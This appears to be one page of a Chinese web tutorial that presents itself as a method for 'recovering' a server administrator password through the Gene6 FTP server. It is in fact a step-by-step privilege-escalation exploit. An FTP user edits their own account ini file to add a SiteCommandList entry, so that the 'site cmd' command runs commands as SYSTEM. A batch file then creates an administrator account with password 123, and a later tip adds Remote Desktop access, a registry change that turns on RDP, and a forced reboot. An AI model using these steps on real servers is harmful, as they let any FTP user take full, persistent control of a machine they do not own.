新思路用Gene恢复系统管理员密码

    二，步步为营恢复远程系统管理员密码：

　　下面我们就来看看如何通过远程登录FTP这样一个看似平常的操作演变为恢复远程服务器上系统管理员密码的艰巨任务。

　　第一步：确认gene已经将自己安装目录发布并当前登录帐号有读写权限。

　　第二步：用有权限的帐号登录gene发布的FTP服务器，进入到GENE安装目录中的accounts/it/users目录，这个it是用gene建立的域，这个了解FTP建立的读者都知道。users目录则是该域下的所有帐户信息。(如图2)

图2

    
    第三步：例如我们用帐号softer进入FTP且具备对应权限准备破解系统密码，那么我们直接下载softer.ini文件到本地硬盘。

　　第四步：下载完毕后用记事本编辑softer.ini文件，在文件的最后添加“SiteCommandList0=-1,cmd,net user xx /add,0,60,-1,-1,”然后保存退出。(如图3)

图3

    
    小提示：

　　ini中的SiteCommandList是配置文件指令，支持在site命令后面添加0，1，2，3以区别各条不同的命令。例如如果ini文件中已经有sitecommandlist0指令了，那么我们再添加时就需要修改为sitecommandlist1命令了。而其他参数的具体意义如下。-1是一些选项是否之类的，不需要关心，cmd就是命令，执行时输入site cmd即可。net user xx /add就是我们要执行的命令，因为Gene6运行在SYSTEM用户权限下，所以他具有系统的完全控制权限，可以执行很多高级命令完成系统操作，接下来的0就是是否将输出改向到你的客户端，60就是超时60秒。

　　第五步：接下来我们再次用softer登录FTP，将编辑修改后的softer.ini覆盖原文件。(如图4)

图4

    
    第六步：当然为了让我们能够批量执行命令提高我们远程执行的效率，我们可以将指令集中写到一个文件中然后由gene远程执行即可，所以我们建立一个后缀为cmd，名字为xx的批处理执行文件，内容如下——

　　@echo off

　　echo "正在添加用户。用户名softer ，密码123"

　　net user softer 123 /add

　　net localgroup Administrators softer /add

　　@echo on

　　将xx.cmd保存到远程服务器的c:\windows目录中。(如图5)

图5

    
    第七步：接下来我们使用ftp登录工具执行对应的脚本程序，笔者以flashfxp为例进行介绍。(如图6)

图6

    
  　第八步：登录到FTP后在文件区域点右键选择“命令->原始命令”。(如图7)

图7

    
    第九步：在原始命令中输入命令——site cmd然后点确定按钮。(如图8)

图8

    
    第十步：这时我们会看到右下角信息区提示我们成功执行了对应的xx.cmd中的命令，包括添加帐户，将该帐户加入到管理员组等操作(如图9)

图9

    
    第十一步：之后我们就可以看到系统中多了一个softer帐号了，而且他的权限也是管理员，这样我们就实现了恢复系统管理员密码的功能。(如图10)(如图11)

图10

图11

    
    小提示：

　　当然之前我们在xx.cmd中输入的只是建立帐号的命令，实际上为了让我们可以直接通过网络远程维护服务器恢复帐号信息，我们可以添加更多的命令，例如net localgroup Remote Desktop Users softer /add将softer帐号添加远程控制组成员实现其可以远程桌面连接登录的目的，还需要加入reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /f /v fDenyTSConnections /t REG_DWORD /d 0命令保证注册表信息中添加开启服务器远程桌面服务的参数命令，毕竟很多时候服务器原本不一定开启了远程控制功能。然后我们再结合shutdown -r -t 0指令让服务器重新启动让修改的配置参数生效。

上一页  [1] [2] [3] 下一页

【责编:Zenghui】